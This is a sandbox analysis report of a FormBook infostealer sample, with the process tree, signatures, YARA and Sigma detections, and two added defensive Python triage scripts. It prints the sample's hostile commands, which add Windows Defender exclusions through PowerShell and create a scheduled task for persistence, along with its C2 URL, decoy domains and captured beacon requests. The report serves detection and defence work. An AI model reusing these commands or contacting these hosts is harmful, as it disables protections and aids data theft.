
Analysis Report HAWB AND INV.exe

Overview

General Information

Sample Name: HAWB AND INV.exe
Analysis ID: 402848
MD5: 42662765a94ce5ece11529509f937711
SHA1: da57dd4c137c47fc9b906caaf067c6ed13fa2da6
SHA256: 2138325dd5e2825ee4086187a944af336476b0327e1ddae7563bb24523836e08
Tags: exe

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Uses ipconfig to lookup or modify the Windows network settings
Uses schtasks.exe or at.exe to add and modify task schedules
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to detect virtual machines (SLDT)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Startup

  • System is w10x64
  • HAWB AND INV.exe (PID: 6752 cmdline: 'C:\Users\user\Desktop\HAWB AND INV.exe' MD5: 42662765A94CE5ECE11529509F937711)
    • powershell.exe (PID: 6932 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HAWB AND INV.exe' MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6948 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 7020 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\qxnptkmQbHB.exe' MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 7064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • schtasks.exe (PID: 7072 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\qxnptkmQbHB' /XML 'C:\Users\user\AppData\Local\Temp\tmp9D41.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 7080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 4592 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\qxnptkmQbHB.exe' MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 4756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • HAWB AND INV.exe (PID: 6156 cmdline: C:\Users\user\Desktop\HAWB AND INV.exe MD5: 42662765A94CE5ECE11529509F937711)
      • explorer.exe (PID: 3440 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • ipconfig.exe (PID: 6556 cmdline: C:\Windows\SysWOW64\ipconfig.exe MD5: B0C7423D02A007461C850CD0DFE09318)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.alldaazz.com/maw9/"], "decoy": ["jaimericart.com", "mayavantcard.com", "romanzava.site", "forefrontunderground.com", "grafikirmarketing.com", "airpoppoff.com", "captureq.com", "vph.ventures", "historiclocation.com", "theoxfordway.com", "springersells.com", "huther.mobi", "networkingmaderas.com", "reggatech.com", "dollfacela.com", "moneycrypt.net", "calidad-precio.net", "hamnsk165.com", "victoriabrownrealtor.com", "itechfreak.com", "bernardocammarata.com", "alfredoarlington.com", "rencontre-montpellier.com", "vipbrandwatch.info", "nhahangminhcuong.com", "senmec23.com", "onemoreusa.com", "dinkoistmatrimony.com", "ideasparatubebe.com", "pozickyauveryinfossk.com", "buildingba.com", "heoslight.com", "ventadecalsotsdevalls.com", "app-cintavcsuges.com", "culturaenmistacones.com", "whyiamvoting.com", "blackopstravel.club", "poorwhitetrashlivesmatters.com", "beachrockisland.com", "natrium-ionen-akkus.com", "noxi.store", "whichrace.com", "mindfulprovision.com", "nznatureguides.com", "fullautoimage.com", "sharonbakcht.com", "ournursingdegreesworld.com", "parismedspas.com", "premier-moment.info", "curvygirlholiday.com", "getsuperyouth.com", "177palmer.com", "headstronghairstudio.com", "sasdrawing.com", "drinkhydrateyourcoffee.com", "globalifier.com", "protocolpolitician.com", "edinglow.com", "isimplix.com", "trendylifefashion.com", "ferhou.com", "ellarewster.club", "ecosanhn.com", "newedulist.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author
0000000A.00000002.473823367.0000000000C50000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
0000000A.00000002.473823367.0000000000C50000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000A.00000002.473823367.0000000000C50000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x166a9:$sqlite3step: 68 34 1C 7B E1
  • 0x167bc:$sqlite3step: 68 34 1C 7B E1
  • 0x166d8:$sqlite3text: 68 38 2A 90 C5
  • 0x167fd:$sqlite3text: 68 38 2A 90 C5
  • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
00000017.00000002.593665337.0000000000880000.00000004.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000017.00000002.593665337.0000000000880000.00000004.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(16 further memory-dump entries not expanded in this export)

Unpacked PEs

Source | Rule | Description | Author
10.2.HAWB AND INV.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
10.2.HAWB AND INV.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x7b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x13885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x13371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x13987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x13aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x858a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x125ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9302:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x18977:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x19a2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
10.2.HAWB AND INV.exe.400000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x158a9:$sqlite3step: 68 34 1C 7B E1
  • 0x159bc:$sqlite3step: 68 34 1C 7B E1
  • 0x158d8:$sqlite3text: 68 38 2A 90 C5
  • 0x159fd:$sqlite3text: 68 38 2A 90 C5
  • 0x158eb:$sqlite3blob: 68 53 D8 7F 8C
  • 0x15a13:$sqlite3blob: 68 53 D8 7F 8C
10.2.HAWB AND INV.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
10.2.HAWB AND INV.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(5 further unpacked-PE entries not expanded in this export)

Sigma Overview

System Summary:

Sigma detected: Scheduled temp file as task from temp location
Source: Process started
Author: Joe Security
Data:
  Command: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\qxnptkmQbHB' /XML 'C:\Users\user\AppData\Local\Temp\tmp9D41.tmp'
  CommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\qxnptkmQbHB' /XML 'C:\Users\user\AppData\Local\Temp\tmp9D41.tmp'
  CommandLine|base64offset|contains: *j
  Image: C:\Windows\SysWOW64\schtasks.exe
  NewProcessName: C:\Windows\SysWOW64\schtasks.exe
  OriginalFileName: C:\Windows\SysWOW64\schtasks.exe
  ParentCommandLine: 'C:\Users\user\Desktop\HAWB AND INV.exe'
  ParentImage: C:\Users\user\Desktop\HAWB AND INV.exe
  ParentProcessId: 6752
  ProcessCommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\qxnptkmQbHB' /XML 'C:\Users\user\AppData\Local\Temp\tmp9D41.tmp'
  ProcessId: 7072
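The Startup tree and the Sigma hit above describe one execution chain: the sample adds Windows Defender path exclusions through PowerShell, registers a scheduled task from an XML file in the user's Temp directory, relaunches a second copy of itself (the suspended process that is hollowed), and network activity then surfaces under explorer.exe and a SysWOW64 ipconfig.exe. The script below is an added example, not part of the Joe Sandbox report: it runs four process-creation rules over constructed event records that mirror that tree. The PIDs, images and command lines are the report's; the root process's parent PID, the explorer.exe image path, the two benign control events at the end, the allow-list in SELF_SPAWN_OK, the NET_UTILS set and the rule names are assumptions of the example.

```python
"""Process-creation triage for the execution chain in this report (added example)."""
import re
from dataclasses import dataclass
from typing import Callable


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full image path as a process-creation event would carry it
    cmdline: str


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE = r"C:\Users\user\Desktop\HAWB AND INV.exe"
DROPPED = r"C:\Users\user\AppData\Roaming\qxnptkmQbHB.exe"

# Constructed events mirroring the Startup tree. PPID 4000 for the root, the
# explorer.exe image path and the last two (benign) events are assumptions.
EVENTS = [
    ProcEvent(6752, 4000, SAMPLE, f"'{SAMPLE}'"),
    ProcEvent(6932, 6752, PS, f"'{PS}' Add-MpPreference -ExclusionPath '{SAMPLE}'"),
    ProcEvent(7020, 6752, PS, f"'{PS}' Add-MpPreference -ExclusionPath '{DROPPED}'"),
    ProcEvent(7072, 6752, r"C:\Windows\SysWOW64\schtasks.exe",
              r"'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\qxnptkmQbHB'"
              r" /XML 'C:\Users\user\AppData\Local\Temp\tmp9D41.tmp'"),
    ProcEvent(4592, 6752, PS, f"'{PS}' Add-MpPreference -ExclusionPath '{DROPPED}'"),
    ProcEvent(6156, 6752, SAMPLE, SAMPLE),                 # sample starts a copy of itself
    ProcEvent(3440, 6156, r"C:\Windows\explorer.exe", ""), # parent as drawn in the tree
    ProcEvent(6556, 3440, r"C:\Windows\SysWOW64\ipconfig.exe", r"C:\Windows\SysWOW64\ipconfig.exe"),
    ProcEvent(8000, 8001, r"C:\Windows\System32\cmd.exe", "cmd.exe"),          # control
    ProcEvent(8002, 8000, r"C:\Windows\System32\ipconfig.exe", "ipconfig /all"),  # control
]

# Programs that legitimately spawn copies of themselves (assumed allow-list).
SELF_SPAWN_OK = {"chrome.exe", "msedge.exe", "firefox.exe", "cmd.exe", "svchost.exe"}
# Console network tools FormBook-style injected code is seen to launch (assumed set).
NET_UTILS = {"ipconfig.exe", "netsh.exe", "nslookup.exe", "netstat.exe"}


def _base(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def defender_exclusion(ev: ProcEvent, by_pid: dict) -> bool:
    # T1562.001: Add-MpPreference -ExclusionPath removes a path from Defender scanning.
    return _base(ev.image) == "powershell.exe" and bool(
        re.search(r"add-mppreference\s+-exclusionpath\b", ev.cmdline, re.I))


def schtasks_temp_xml(ev: ProcEvent, by_pid: dict) -> bool:
    # T1053.005: task created from an XML definition living under %LOCALAPPDATA%\Temp.
    if _base(ev.image) != "schtasks.exe":
        return False
    m = re.search(r"/xml\s+(.+)$", ev.cmdline, re.I)
    if not m:
        return False
    xml_path = m.group(1).strip().strip("'\"").lower()
    return "\\appdata\\local\\temp\\" in xml_path


def self_spawn(ev: ProcEvent, by_pid: dict) -> bool:
    # Heuristic for the hollowing step: a non-browser binary launching its own image.
    parent = by_pid.get(ev.ppid)
    return (parent is not None
            and parent.image.lower() == ev.image.lower()
            and _base(ev.image) not in SELF_SPAWN_OK)


def shell_spawns_netutil(ev: ProcEvent, by_pid: dict) -> bool:
    # explorer.exe (a GUI shell) starting a 32-bit console network tool with no
    # arguments is consistent with injected code picking a host for the next stage.
    parent = by_pid.get(ev.ppid)
    if parent is None or _base(parent.image) != "explorer.exe":
        return False
    if ev.cmdline.lower().startswith(ev.image.lower()):
        args = ev.cmdline[len(ev.image):].strip()
    else:
        args = ev.cmdline.strip()
    return _base(ev.image) in NET_UTILS and "\\syswow64\\" in ev.image.lower() and not args


RULES: dict[str, Callable[[ProcEvent, dict], bool]] = {
    "defender_exclusion": defender_exclusion,
    "schtasks_temp_xml": schtasks_temp_xml,
    "self_spawn": self_spawn,
    "shell_spawns_netutil": shell_spawns_netutil,
}


def triage(events: list) -> dict:
    """Return {pid: [rule names that fired]} for every event that matched at least one rule."""
    by_pid = {ev.pid: ev for ev in events}
    hits = {}
    for ev in events:
        names = [name for name, rule in RULES.items() if rule(ev, by_pid)]
        if names:
            hits[ev.pid] = names
    return hits


if __name__ == "__main__":
    for pid, names in triage(EVENTS).items():
        print(pid, names)
```

Run against the constructed events, the three PowerShell exclusions (PIDs 6932, 7020, 4592), the schtasks registration (7072), the self-relaunch (6156) and the explorer-spawned ipconfig (6556) are flagged, while the admin's cmd.exe and its "ipconfig /all" are not. The parent-child pairing is what carries the signal: Add-MpPreference and schtasks are ordinary on their own, but here all of them hang off one user-profile executable that also restarts itself.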

          Signature Overview

AV Detection:

Found malware configuration
Source: 0000000A.00000002.473823367.0000000000C50000.00000040.00000001.sdmp | Malware Configuration Extractor: FormBook (C2 list and decoy list as given under Malware Configuration above)
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\qxnptkmQbHB.exe | ReversingLabs: Detection: 21%
Multi AV Scanner detection for submitted file
Source: HAWB AND INV.exe | ReversingLabs: Detection: 21%
Yara detected FormBook
Source: Yara match | File source: 0000000A.00000002.473823367.0000000000C50000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000002.593665337.0000000000880000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.470161659.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.482267255.00000000014E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000002.591815076.0000000000110000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.350474951.0000000003CE9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000002.593621716.0000000000850000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 10.2.HAWB AND INV.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.HAWB AND INV.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.HAWB AND INV.exe.3d81880.3.raw.unpack, type: UNPACKEDPE
Source: 10.2.HAWB AND INV.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: HAWB AND INV.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: HAWB AND INV.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: ipconfig.pdb | source: HAWB AND INV.exe, 0000000A.00000002.485361222.0000000003100000.00000040.00000001.sdmp
Source: Binary string: ipconfig.pdbGCTL | source: HAWB AND INV.exe, 0000000A.00000002.485361222.0000000003100000.00000040.00000001.sdmp
Source: Binary string: wscui.pdbUGP | source: explorer.exe, 0000000B.00000000.426929861.000000000DC20000.00000002.00000001.sdmp
Source: Binary string: wntdll.pdbUGP | source: HAWB AND INV.exe, 0000000A.00000002.479054770.00000000012CF000.00000040.00000001.sdmp, ipconfig.exe, 00000017.00000003.473141653.00000000008F0000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdb | source: HAWB AND INV.exe, ipconfig.exe
Source: Binary string: wscui.pdb | source: explorer.exe, 0000000B.00000000.426929861.000000000DC20000.00000002.00000001.sdmp
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 4x nop then pop esi
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 4x nop then pop edi
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 4x nop then pop esi
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 4x nop then pop edi

Networking:

C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: www.alldaazz.com/maw9/
Source: global traffic | HTTP traffic detected: GET /maw9/?AVF=4eDAg+VUuFTPb+HpMV2XwHXrAkW6c8A/v4D4zAieFew51h9R0F5m+f+tz7m/68XBKeAB57yd0w==&6l=sHbLpdw8x0Nx4 HTTP/1.1 | Host: www.dinkoistmatrimony.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic | HTTP traffic detected: GET /maw9/?AVF=6+c9WwA91vc3q1qPV/bxdb4jLCwfrBo6mkGAjXedmMMeaWqNVTNOJ33lEW7rMTYT0EzxW77dCg==&6l=sHbLpdw8x0Nx4 HTTP/1.1 | Host: www.premier-moment.info | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic | HTTP traffic detected: GET /maw9/?AVF=cbTyfQFVyV4qwzSuB5gkHhMhd4ZKxxzMSggVhGr4392xKRAUAYS1aRQvNzIyvi+llhoR0m7eyA==&6l=sHbLpdw8x0Nx4 HTTP/1.1 | Host: www.ecosanhn.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic | HTTP traffic detected: GET /maw9/?AVF=ueXSnp9RuZV4VGv1GREwgsKbz6ngTp3QynINalfLY22/qL3buQO/ZY9WhadtjkGC+9EglwJKpA==&6l=sHbLpdw8x0Nx4 HTTP/1.1 | Host: www.curvygirlholiday.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic | HTTP traffic detected: GET /maw9/?AVF=CxDYGZqaFGf+wggxXYaRsXxHYh0vkMvLuxQU/eiz8BKY71rUvugXdjEA5Q+gRIVecMz1lX5ZhQ==&6l=sHbLpdw8x0Nx4 HTTP/1.1 | Host: www.networkingmaderas.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: Joe Sandbox View | ASN Name: ASDETUKhttpwwwheficedcomGB
Source: Joe Sandbox View | ASN Name: AS-26496-GO-DADDY-COM-LLCUS
Source: unknown | DNS traffic detected: queries for: www.dinkoistmatrimony.com
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | Content-Type: text/html | Transfer-Encoding: chunked | Date: Mon, 03 May 2021 12:53:52 GMT | Server: LiteSpeed
  Data (first chunk, 0x2872 bytes, decoded from the captured hex; the excerpt ends where the capture does):
    <!DOCTYPE html>
    <html>
        <head>
        <meta http-equiv="Content-type" content="text/html; charset=utf-8">
        <meta http-equiv="Cache-control" content="no-cache">
        <meta http-equiv="Pragma" content="no-cache">
        <meta http-equiv="Expires" content="0">
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
        <title>404 Not Found</title>
        <style type="text/css">
            body {
                font-family: Arial, Helvetica, sans-serif;
                font-size: 14px;
                line-height: 1.428571429;
                background-color: #ffffff;
                color: #2F3230;
                padding: 0;
                margin: 0;
            }
            section, footer {
                display: block;
                padding: 0;
                margin: 0;
            }
            .container {
                margin-left: auto;
                margin-right: auto;
                padding: 0 10px;
            }
            .response-info {
                color: #CCCC
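The five captured GET requests all carry the same /maw9/ path as the configured C2 entry, but every Host header is one of the configured decoy domains; the real C2 host (www.alldaazz.com) never appears in the capture, and the hosts that answered returned a generic 404. The script below is an added example, not part of the Joe Sandbox report: it correlates the requests with the extracted configuration. CONFIG holds the report's C2 entry and the subset of its decoy list that the captured traffic touched (plus one untouched decoy); REQUESTS are the five requests as printed above. The field names in the result ("role", "tag", "avf_bytes") are this example's own, and nothing here decrypts the AVF blob, it only measures it.

```python
"""Correlate captured FormBook beacons with the extracted configuration (added example)."""
import base64
from urllib.parse import urlsplit

# Constructed from the report: the C2 entry and a subset of the decoy list.
CONFIG = {
    "C2 list": ["www.alldaazz.com/maw9/"],
    "decoy": ["dinkoistmatrimony.com", "premier-moment.info", "ecosanhn.com",
              "curvygirlholiday.com", "networkingmaderas.com", "jaimericart.com"],
}

# (Host header, request target) for each captured GET, copied from the Networking section.
REQUESTS = [
    ("www.dinkoistmatrimony.com",
     "/maw9/?AVF=4eDAg+VUuFTPb+HpMV2XwHXrAkW6c8A/v4D4zAieFew51h9R0F5m+f+tz7m/68XBKeAB57yd0w==&6l=sHbLpdw8x0Nx4"),
    ("www.premier-moment.info",
     "/maw9/?AVF=6+c9WwA91vc3q1qPV/bxdb4jLCwfrBo6mkGAjXedmMMeaWqNVTNOJ33lEW7rMTYT0EzxW77dCg==&6l=sHbLpdw8x0Nx4"),
    ("www.ecosanhn.com",
     "/maw9/?AVF=cbTyfQFVyV4qwzSuB5gkHhMhd4ZKxxzMSggVhGr4392xKRAUAYS1aRQvNzIyvi+llhoR0m7eyA==&6l=sHbLpdw8x0Nx4"),
    ("www.curvygirlholiday.com",
     "/maw9/?AVF=ueXSnp9RuZV4VGv1GREwgsKbz6ngTp3QynINalfLY22/qL3buQO/ZY9WhadtjkGC+9EglwJKpA==&6l=sHbLpdw8x0Nx4"),
    ("www.networkingmaderas.com",
     "/maw9/?AVF=CxDYGZqaFGf+wggxXYaRsXxHYh0vkMvLuxQU/eiz8BKY71rUvugXdjEA5Q+gRIVecMz1lX5ZhQ==&6l=sHbLpdw8x0Nx4"),
]


def _strip_www(host: str) -> str:
    host = host.lower()
    return host[4:] if host.startswith("www.") else host


def parse_c2(entry: str):
    """'www.alldaazz.com/maw9/' -> ('www.alldaazz.com', '/maw9/'); config entries carry no scheme."""
    u = urlsplit("http://" + entry)
    return u.hostname, u.path


def parse_query(query: str) -> dict:
    # Split by hand: parse_qs would turn the '+' characters inside the base64 blob into spaces.
    out = {}
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        out[key] = value
    return out


def classify(host: str, target: str, config: dict = CONFIG) -> dict:
    """Label one request as traffic to the C2 host, to a configured decoy, or to an unknown host."""
    u = urlsplit(target)
    c2_host, c2_path = parse_c2(config["C2 list"][0])
    decoys = {d.lower() for d in config["decoy"]}
    bare = _strip_www(host)
    if bare == _strip_www(c2_host):
        role = "c2"
    elif bare in decoys:
        role = "decoy"
    else:
        role = "unknown"
    q = parse_query(u.query)
    avf = base64.b64decode(q.get("AVF", ""))   # opaque encrypted blob; only its size is reported
    return {
        "host": host,
        "role": role,
        "path_matches_c2": u.path == c2_path,
        "avf_bytes": len(avf),
        "tag": q.get("6l"),                     # second parameter, constant across this capture
    }


def classify_all(requests=REQUESTS, config: dict = CONFIG) -> list:
    return [classify(host, target, config) for host, target in requests]


def summarize(results: list) -> dict:
    """Count requests per role, e.g. {'decoy': 5}."""
    counts = {}
    for r in results:
        counts[r["role"]] = counts.get(r["role"], 0) + 1
    return counts


if __name__ == "__main__":
    results = classify_all()
    for r in results:
        print(r)
    print(summarize(results))
```

For this capture the result is five decoy hits, zero C2 hits, the same /maw9/ path and the same 6l value on every request, and an AVF blob of identical length each time. The practical consequence for a detection team is that blocking or alerting on the C2 host alone would have caught none of the observed traffic; the path-plus-parameter shape and the full decoy list from the configuration are the indicators that actually match what the sample sent.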
Source: ipconfig.exe, 00000017.00000002.598011304.0000000003162000.00000004.00000001.sdmp | String found in binary or memory: http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404refer
Source: powershell.exe, 00000002.00000002.526394287.0000000002FEF000.00000004.00000001.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: powershell.exe, 00000002.00000002.529584600.00000000049DE000.00000004.00000001.sdmp, powershell.exe, 00000004.00000003.464881292.0000000008023000.00000004.00000001.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: HAWB AND INV.exe, 00000000.00000002.347517443.0000000002CE1000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.527445795.00000000048A1000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000002.00000002.529584600.00000000049DE000.00000004.00000001.sdmp, powershell.exe, 00000004.00000003.464881292.0000000008023000.00000004.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: explorer.exe, 0000000B.00000002.594031738.000000000095C000.00000004.00000020.sdmp | String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
